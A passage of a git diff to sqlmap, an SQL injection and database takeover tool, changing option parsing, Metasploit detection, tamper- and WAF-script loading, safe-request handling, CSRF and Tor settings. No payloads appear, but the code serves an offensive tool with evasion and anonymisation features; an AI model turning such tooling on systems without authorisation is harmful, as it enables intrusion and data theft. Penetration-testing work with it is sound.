             envPath = envPath.replace(";", "")
 
-            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
-                infoMsg = "Metasploit Framework has been found "
-                infoMsg += "installed in the '%s' path" % envPath
-                logger.info(infoMsg)
-
+            if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
                 msfEnvPathExists = True
-                conf.msfPath = envPath
+                if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
+                    kb.oldMsf = False
+                elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.oldMsf = True
+                else:
+                    msfEnvPathExists = False
 
-                break
+                if msfEnvPathExists:
+                    infoMsg = "Metasploit Framework has been found "
+                    infoMsg += "installed in the '%s' path" % envPath
+                    logger.info(infoMsg)
+
+                    conf.msfPath = envPath
+
+                    break
 
     if not msfEnvPathExists:
         errMsg = "unable to locate Metasploit Framework installation. "
@@ -885,16 +909,14 @@ def _setDBMS():
 
     if conf.dbms not in SUPPORTED_DBMS:
         errMsg = "you provided an unsupported back-end database management "
-        errMsg += "system. The supported DBMS are %s. " % ', '.join([_ for _ in DBMS_DICT])
+        errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted(_ for _ in DBMS_DICT))
         errMsg += "If you do not know the back-end DBMS, do not provide "
         errMsg += "it and sqlmap will fingerprint it for you."
         raise SqlmapUnsupportedDBMSException(errMsg)
 
-    for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \
-                    SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \
-                    MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES):
+    for dbms, aliases in DBMS_ALIASES:
         if conf.dbms in aliases:
-            conf.dbms = aliases[0]
+            conf.dbms = dbms
 
             break
 
@@ -944,13 +966,13 @@ def _setTamperingFunctions():
 
             try:
                 module = __import__(filename[:-3])
-            except ImportError, msg:
+            except (ImportError, SyntaxError), msg:
                 raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
 
             priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
 
             for name, function in inspect.getmembers(module, inspect.isfunction):
-                if name == "tamper":
+                if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
                     found = True
                     kb.tamperFunctions.append(function)
                     function.func_name = module.__name__
@@ -982,6 +1004,11 @@ def _setTamperingFunctions():
                 errMsg += "in tamper script '%s'" % tfile
                 raise SqlmapGenericException(errMsg)
 
+        if kb.tamperFunctions and len(kb.tamperFunctions) > 3:
+            warnMsg = "using too many tamper scripts is usually not "
+            warnMsg += "a good idea"
+            logger.warning(warnMsg)
+
         if resolve_priorities and priorities:
             priorities.sort(reverse=True)
             kb.tamperFunctions = []
@@ -1009,13 +1036,15 @@ def _setWafFunctions():
                 sys.path.insert(0, dirname)
 
             try:
+                if filename[:-3] in sys.modules:
+                    del sys.modules[filename[:-3]]
                 module = __import__(filename[:-3])
             except ImportError, msg:
                 raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
 
             _ = dict(inspect.getmembers(module))
             if "detect" not in _:
-                errMsg = "missing function 'detect(page, headers, code)' "
+                errMsg = "missing function 'detect(get_page)' "
                 errMsg += "in WAF script '%s'" % found
                 raise SqlmapGenericException(errMsg)
             else:
@@ -1068,7 +1097,12 @@ def _setHTTPProxy():
     debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
     logger.debug(debugMsg)
 
-    _ = urlparse.urlsplit(conf.proxy)
+    try:
+        _ = urlparse.urlsplit(conf.proxy)
+    except Exception, ex:
+        errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex)
+        raise SqlmapSyntaxException, errMsg
+
     hostnamePort = _.netloc.split(":")
 
     scheme = _.scheme.upper()
@@ -1116,21 +1150,63 @@ def _setHTTPProxy():
 
     proxyHandler.__init__(proxyHandler.proxies)
 
-def _setSafeUrl():
+def _setSafeVisit():
     """
-    Check and set the safe URL options.
+    Check and set the safe visit options.
     """
-    if not conf.safUrl:
+    if not any ((conf.safeUrl, conf.safeReqFile)):
         return
 
-    if not re.search("^http[s]*://", conf.safUrl):
-        if ":443/" in conf.safUrl:
-            conf.safUrl = "https://" + conf.safUrl
-        else:
-            conf.safUrl = "http://" + conf.safUrl
+    if conf.safeReqFile:
+        checkFile(conf.safeReqFile)
 
-    if conf.saFreq <= 0:
-        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe URL feature"
+        raw = readCachedFileContent(conf.safeReqFile)
+        match = re.search(r"\A([A-Z]+) ([^ ]+) HTTP/[0-9.]+\Z", raw[:raw.find('\n')])
+
+        if match:
+            kb.safeReq.method = match.group(1)
+            kb.safeReq.url = match.group(2)
+            kb.safeReq.headers = {}
+
+            for line in raw[raw.find('\n') + 1:].split('\n'):
+                line = line.strip()
+                if line and ':' in line:
+                    key, value = line.split(':', 1)
+                    value = value.strip()
+                    kb.safeReq.headers[key] = value
+                    if key == HTTP_HEADER.HOST:
+                        if not value.startswith("http"):
+                            scheme = "http"
+                            if value.endswith(":443"):
+                                scheme = "https"
+                            value = "%s://%s" % (scheme, value)
+                        kb.safeReq.url = urlparse.urljoin(value, kb.safeReq.url)
+                else:
+                    break
+
+            post = None
+
+            if '\r\n\r\n' in raw:
+                post = raw[raw.find('\r\n\r\n') + 4:]
+            elif '\n\n' in raw:
+                post = raw[raw.find('\n\n') + 2:]
+
+            if post and post.strip():
+                kb.safeReq.post = post
+            else:
+                kb.safeReq.post = None
+        else:
+            errMsg = "invalid format of a safe request file"
+            raise SqlmapSyntaxException, errMsg
+    else:
+        if not re.search("^http[s]*://", conf.safeUrl):
+            if ":443/" in conf.safeUrl:
+                conf.safeUrl = "https://" + conf.safeUrl
+            else:
+                conf.safeUrl = "http://" + conf.safeUrl
+
+    if conf.safeFreq <= 0:
+        errMsg = "please provide a valid value (>0) for safe frequency (--safe-freq) while using safe visit features"
         raise SqlmapSyntaxException(errMsg)
 
 def _setPrefixSuffix():
@@ -1182,6 +1258,9 @@ def _setHTTPAuthentication():
     if not conf.authType and not conf.authCred and not conf.authPrivate:
         return
 
+    if conf.authPrivate and not conf.authType:
+        conf.authType = AUTH_TYPE.PKI
+
     elif conf.authType and not conf.authCred and not conf.authPrivate:
         errMsg = "you specified the HTTP authentication type, but "
         errMsg += "did not provide the credentials"
@@ -1192,7 +1271,7 @@ def _setHTTPAuthentication():
         errMsg += "but did not provide the type"
         raise SqlmapSyntaxException(errMsg)
 
-    elif conf.authType.lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
+    elif (conf.authType or "").lower() not in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST, AUTH_TYPE.NTLM, AUTH_TYPE.PKI):
         errMsg = "HTTP authentication type value must be "
         errMsg += "Basic, Digest, NTLM or PKI"
         raise SqlmapSyntaxException(errMsg)
@@ -1248,19 +1327,9 @@ def _setHTTPAuthentication():
         debugMsg = "setting the HTTP(s) authentication PEM private key"
         logger.debug(debugMsg)
 
-        key_file = os.path.expanduser(conf.authPrivate)
-        checkFile(key_file)
-        authHandler = HTTPSPKIAuthHandler(key_file)
-
-def _setHTTPMethod():
-    """
-    Check and set the HTTP method to perform HTTP requests through.
-    """
-
-    conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
-
-    debugMsg = "setting the HTTP method to %s" % conf.method
-    logger.debug(debugMsg)
+        _ = safeExpandUser(conf.authPrivate)
+        checkFile(_)
+        authHandler = HTTPSPKIAuthHandler(_)
 
 def _setHTTPExtraHeaders():
     if conf.headers:
@@ -1270,6 +1339,9 @@ def _setHTTPExtraHeaders():
         conf.headers = conf.headers.split("\n") if "\n" in conf.headers else conf.headers.split("\\n")
 
         for headerValue in conf.headers:
+            if not headerValue.strip():
+                continue
+
             if headerValue.count(':') >= 1:
                 header, value = (_.lstrip() for _ in headerValue.split(":", 1))
 
@@ -1387,6 +1459,17 @@ def _setHTTPReferer():
 
         conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.referer))
 
+def _setHTTPHost():
+    """
+    Set the HTTP Host
+    """
+
+    if conf.host:
+        debugMsg = "setting the HTTP Host header"
+        logger.debug(debugMsg)
+
+        conf.httpHeaders.append((HTTP_HEADER.HOST, conf.host))
+
 def _setHTTPCookies():
     """
     Set the HTTP Cookie header
@@ -1428,6 +1511,30 @@ def _checkDependencies():
     if conf.dependencies:
         checkDependencies()
 
+def _createTemporaryDirectory():
+    """
+    Creates temporary directory for this run.
+    """
+
+    try:
+        if not os.path.isdir(tempfile.gettempdir()):
+            os.makedirs(tempfile.gettempdir())
+    except IOError, ex:
+        errMsg = "there has been a problem while accessing "
+        errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
+        errMsg += "make sure that there is enough disk space left. If problem persists, "
+        errMsg += "try to set environment variable 'TEMP' to a location "
+        errMsg += "writeable by the current user"
+        raise SqlmapSystemException, errMsg
+
+    if "sqlmap" not in (tempfile.tempdir or ""):
+        tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+
+    kb.tempDir = tempfile.tempdir
+
+    if not os.path.isdir(tempfile.tempdir):
+        os.makedirs(tempfile.tempdir)
+
 def _cleanupOptions():
     """
     Cleanup configuration attributes.
@@ -1445,7 +1552,7 @@ def _cleanupOptions():
 
     for key, value in conf.items():
         if value and any(key.endswith(_) for _ in ("Path", "File")):
-            conf[key] = os.path.expanduser(value)
+            conf[key] = safeExpandUser(value)
 
     if conf.testParameter:
         conf.testParameter = urldecode(conf.testParameter)
@@ -1512,8 +1619,8 @@ def _cleanupOptions():
         conf.dbms = conf.dbms.capitalize()
 
     if conf.testFilter:
-        if not any([char in conf.testFilter for char in ('.', ')', '(', ']', '[')]):
-            conf.testFilter = conf.testFilter.replace('*', '.*')
+        conf.testFilter = conf.testFilter.strip('*+')
+        conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
 
     if "timeSec" not in kb.explicitSettings:
         if conf.tor:
@@ -1579,6 +1686,13 @@ def _cleanupOptions():
     threadData = getCurrentThreadData()
     threadData.reset()
 
+def _dirtyPatches():
+    """
+    Place for "dirty" Python related patches
+    """
+
+    httplib._MAXLINE = 1 * 1024 * 1024  # to accept overly long result lines (e.g. SQLi results in HTTP header responses)
+
 def _purgeOutput():
     """
     Safely removes (purges) output directory.
@@ -1651,8 +1765,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
 
     kb.chars = AttribDict()
     kb.chars.delimiter = randomStr(length=6, lowercase=True)
-    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
-    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
+    kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
     kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
 
     kb.columnExistsChoice = None
@@ -1681,6 +1795,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.followSitemapRecursion = None
     kb.forcedDbms = None
     kb.forcePartialUnion = False
+    kb.forceWhere = None
+    kb.futileUnion = None
     kb.headersFp = {}
     kb.heuristicDbms = None
     kb.heuristicMode = False
@@ -1707,9 +1823,11 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.multiThreadMode = False
     kb.negativeLogic = False
     kb.nullConnection = None
+    kb.oldMsf = None
     kb.orderByColumns = None
     kb.originalCode = None
     kb.originalPage = None
+    kb.originalPageTime = None
     kb.originalTimeDelay = None
     kb.originalUrls = dict()
 
@@ -1743,15 +1861,21 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.responseTimes = []
     kb.resumeValues = True
     kb.safeCharEncode = False
+    kb.safeReq = AttribDict()
     kb.singleLogFlags = set()
     kb.reduceTests = None
+    kb.tlsSNI = None
     kb.stickyDBMS = False
     kb.stickyLevel = None
+    kb.storeCrawlingChoice = None
     kb.storeHashesChoice = None
     kb.suppressResumeInfo = False
     kb.technique = None
+    kb.tempDir = None
     kb.testMode = False
+    kb.testOnlyCustom = False
     kb.testQueryCount = 0
+    kb.testType = None
     kb.threadContinue = True
     kb.threadException = False
     kb.tableExistsChoice = None
@@ -1788,11 +1912,11 @@ def _useWizardInterface():
         message = "Please enter full target URL (-u): "
         conf.url = readInput(message, default=None)
 
-    message = "POST data (--data) [Enter for None]: "
+    message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
     conf.data = readInput(message, default=None)
 
     if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
-        warnMsg = "no GET and/or POST parameter(s) found for testing "
+        warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
         warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
         if not conf.crawlDepth and not conf.forms:
             warnMsg += "Will search for forms"
@@ -1888,7 +2012,13 @@ def _saveCmdline():
             config.set(family, option, value)
 
     confFP = openFile(paths.SQLMAP_CONFIG, "wb")
-    config.write(confFP)
+
+    try:
+        config.write(confFP)
+    except IOError, ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex)
+        raise SqlmapSystemException(errMsg)
 
     infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG
     logger.info(infoMsg)
@@ -2080,6 +2210,18 @@ def _setTorSocksProxySettings():
     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT)
     socks.wrapmodule(urllib2)
 
+def _checkWebSocket():
+    infoMsg = "checking for WebSocket"
+    logger.debug(infoMsg)
+
+    if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
+        try:
+            from websocket import ABNF
+        except ImportError:
+            errMsg = "sqlmap requires third-party module 'websocket-client' "
+            errMsg += "in order to use WebSocket funcionality"
+            raise SqlmapMissingDependence(errMsg)
+
 def _checkTor():
     if not conf.checkTor:
         return
@@ -2170,6 +2312,20 @@ def _basicOptionValidation():
         errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.regexp:
+        try:
+            re.compile(conf.regexp)
+        except re.error, ex:
+            errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex)
+            raise SqlmapSyntaxException(errMsg)
+
+    if conf.crawlExclude:
+        try:
+            re.compile(conf.crawlExclude)
+        except re.error, ex:
+            errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex)
+            raise SqlmapSyntaxException(errMsg)
+
     if conf.dumpTable and conf.dumpAll:
         errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
         raise SqlmapSyntaxException(errMsg)
@@ -2178,7 +2334,7 @@ def _basicOptionValidation():
         errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.threads > MAX_NUMBER_OF_THREADS:
+    if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
         errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
         raise SqlmapSyntaxException(errMsg)
 
@@ -2186,6 +2342,30 @@ def _basicOptionValidation():
         errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
         raise SqlmapSyntaxException(errMsg)
 
+    if conf.crawlExclude and not conf.crawlDepth:
+        errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.safePost and not conf.safeUrl:
+        errMsg = "option '--safe-post' requires usage of option '--safe-url'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
+        errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
+        errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.csrfUrl and not conf.csrfToken:
+        errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
+        raise SqlmapSyntaxException(errMsg)
+
+    if conf.csrfToken and conf.threads > 1:
+        errMsg = "option '--csrf-url' is incompatible with option '--threads'"
+        raise SqlmapSyntaxException(errMsg)
+
     if conf.requestFile and conf.url and conf.url != DUMMY_URL:
         errMsg = "option '-r' is incompatible with option '-u' ('--url')"
         raise SqlmapSyntaxException(errMsg)
@@ -2214,8 +2394,8 @@ def _basicOptionValidation():
         errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
         raise SqlmapSyntaxException(errMsg)
 
-    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort > 0):
-        errMsg = "value for option '--tor-port' must be a positive integer"
+    if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
+        errMsg = "value for option '--tor-port' must be in range 0-65535"
         raise SqlmapSyntaxException(errMsg)
 
     if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
@@ -2280,7 +2460,7 @@ def _resolveCrossReferences():
     lib.controller.checks.setVerbosity = setVerbosity
 
 def initOptions(inputOptions=AttribDict(), overrideOptions=False):
-    if not inputOptions.disableColoring:
+    if IS_WIN:
         coloramainit()
 
     _setConfAttributes()
@@ -2298,8 +2478,10 @@ def init():
     _saveCmdline()
     _setRequestFromFile()
     _cleanupOptions()
+    _dirtyPatches()
     _purgeOutput()
     _checkDependencies()
+    _createTemporaryDirectory()
     _basicOptionValidation()
     _setProxyList()
     _setTorProxySettings()
@@ -2310,6 +2492,7 @@ def init():
     _setWafFunctions()
     _setTrafficOutputFP()
     _resolveCrossReferences()
+    _checkWebSocket()
 
     parseTargetUrl()
     parseTargetDirect()
@@ -2319,12 +2502,12 @@ def init():
         _setHTTPExtraHeaders()
         _setHTTPCookies()
         _setHTTPReferer()
+        _setHTTPHost()
         _setHTTPUserAgent()
-        _setHTTPMethod()
         _setHTTPAuthentication()
         _setHTTPProxy()
         _setDNSCache()
-        _setSafeUrl()
+        _setSafeVisit()
         _setGoogleDorking()
         _setBulkMultipleTargets()
         _setSitemapTargets()
@@ -2340,6 +2523,7 @@ def init():
     _setWriteFile()
     _setMetasploit()
     _setDBMSAuthentication()
+    loadBoundaries()
     loadPayloads()
     _setPrefixSuffix()
     update()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index cfbd02b67..b9adbd67b 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -23,6 +23,7 @@ optDict = {
                              },
 
             "Request":       {
+                               "method":            "string",
                                "data":              "string",
                                "paramDel":          "string",
                                "cookie":            "string",
@@ -49,9 +50,13 @@ optDict = {
                                "timeout":           "float",
                                "retries":           "integer",
                                "rParam":            "string",
-                               "safUrl":            "string",
-                               "saFreq":            "integer",
+                               "safeUrl":           "string",
+                               "safePost":          "string",
+                               "safeReqFile":       "string",
+                               "safeFreq":          "integer",
                                "skipUrlEncode":     "boolean",
+                               "csrfToken":         "string",
+                               "csrfUrl":           "string",
                                "forceSSL":          "boolean",
                                "hpp":               "boolean",
                                "evalCode":          "string",
@@ -68,6 +73,7 @@ optDict = {
             "Injection":     {
                                "testParameter":     "string",
                                "skip":              "string",
+                               "skipStatic":        "boolean",
                                "dbms":              "string",
                                "dbmsCred":          "string",
                                "os":                "string",
@@ -185,6 +191,7 @@ optDict = {
                                "batch":             "boolean",
                                "charset":           "string",
                                "crawlDepth":        "integer",
+                               "crawlExclude":      "string",
                                "csvDel":            "string",
                                "dumpFormat":        "string",
                                "eta":               "boolean",
@@ -202,16 +209,15 @@ optDict = {
                              },
 
             "Miscellaneous": {
-                               "mnemonics":         "string",
                                "alert":             "string",
                                "answers":           "string",
                                "beep":              "boolean",
-                               "checkWaf":          "boolean",
                                "cleanup":           "boolean",
                                "dependencies":      "boolean",
                                "disableColoring":   "boolean",
                                "googlePage":        "integer",
                                "mobile":            "boolean",
+                               "offline":           "boolean",
                                "pageRank":          "boolean",
                                "purgeOutput":       "boolean",
                                "smart":             "boolean",
diff --git a/lib/core/profiling.py b/lib/core/profiling.py
index e316c31ee..c212a0bb5 100644
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py
index 1ad455b49..2dc0467c4 100644
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/replication.py b/lib/core/replication.py
index 72787eb16..c5bbd24cc 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -70,7 +70,7 @@ class Replication(object):
             try:
                 self.parent.cursor.execute(sql, parameters)
             except sqlite3.OperationalError, ex:
-                errMsg = "problem occurred ('%s') while accessing sqlite database " % ex
+                errMsg = "problem occurred ('%s') while accessing sqlite database " % unicode(ex)
                 errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
                 errMsg += "it's not used by some other program"
                 raise SqlmapGenericException(errMsg)
diff --git a/lib/core/revision.py b/lib/core/revision.py
index 5caf32ef8..5319f1aa3 100644
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/session.py b/lib/core/session.py
index ccb529987..68b4e13a4 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4f1e23616..325855514 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,12 +1,11 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import os
-import random
 import re
 import subprocess
 import string
@@ -26,20 +25,23 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
 SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
-ML = "sqlmap-users@lists.sourceforge.net"
+GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
 
 # colorful banner
 BANNER = """\033[01;33m         _
  ___ ___| |_____ ___ ___  \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
 |_ -| . | |     | .'| . |
 |___|_  |_|_|_|_|__,|  _|
-      |_|           |_|   \033[0m\033[4m%s\033[0m\n
+      |_|           |_|   \033[0m\033[4;37m%s\033[0m\n
 """ % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
 
 # Minimum distance of ratio from kb.matchRatio to result in True
 DIFF_TOLERANCE = 0.05
 CONSTANT_RATIO = 0.9
 
+# Ratio used in heuristic check for WAF/IDS/IPS protected targets
+IDS_WAF_CHECK_RATIO = 0.5
+
 # Lower and upper values for match ratio in case of stable page
 LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98
@@ -47,6 +49,7 @@ UPPER_RATIO_BOUND = 0.98
 # Markers for special cases when parameter values contain html encoded characters
 PARAMETER_AMP_MARKER = "__AMP__"
 PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
+BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
 PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
 PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
 URI_QUESTION_MARKER = "__QUESTION_MARK__"
@@ -78,6 +81,9 @@ TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|fo
 # Regular expression used for recognition of IP addresses
 IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
 
+# Regular expression used for recognition of generic "your ip has been blocked" messages
+BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
+
 # Dumping characters used in GROUP_CONCAT MySQL technique
 CONCAT_ROW_DELIMITER = ','
 CONCAT_VALUE_DELIMITER = '|'
@@ -139,10 +145,10 @@ INFERENCE_EQUALS_CHAR = "="
 # Character used for operation "not-equals" in inference
 INFERENCE_NOT_EQUALS_CHAR = "!="
 
-# String used for representation of unknown dbms
+# String used for representation of unknown DBMS
 UNKNOWN_DBMS = "Unknown"
 
-# String used for representation of unknown dbms version
+# String used for representation of unknown DBMS version
 UNKNOWN_DBMS_VERSION = "Unknown"
 
 # Dynamicity mark length used in dynamicity removal engine
@@ -201,10 +207,15 @@ DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) f
 SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
 SUPPORTED_OS = ("linux", "windows")
 
+DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
+
 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)
 
+# Names that can't be used to name files on Windows OS
+WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
+
 # Items displayed in basic help (-h) output
 BASIC_HELP_ITEMS = (
                         "url",
@@ -237,6 +248,7 @@ BASIC_HELP_ITEMS = (
                         "checkTor",
                         "flushSession",
                         "tor",
+                        "sqlmapShell",
                         "wizard",
                    )
 
@@ -261,7 +273,7 @@ ERROR_PARSING_REGEXES = (
 META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
 
 # Regular expression used for parsing refresh info from meta html headers
-META_REFRESH_REGEX = r'(?si)<head>.*<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
+META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
 
 # Regular expression used for parsing empty fields in tested form data
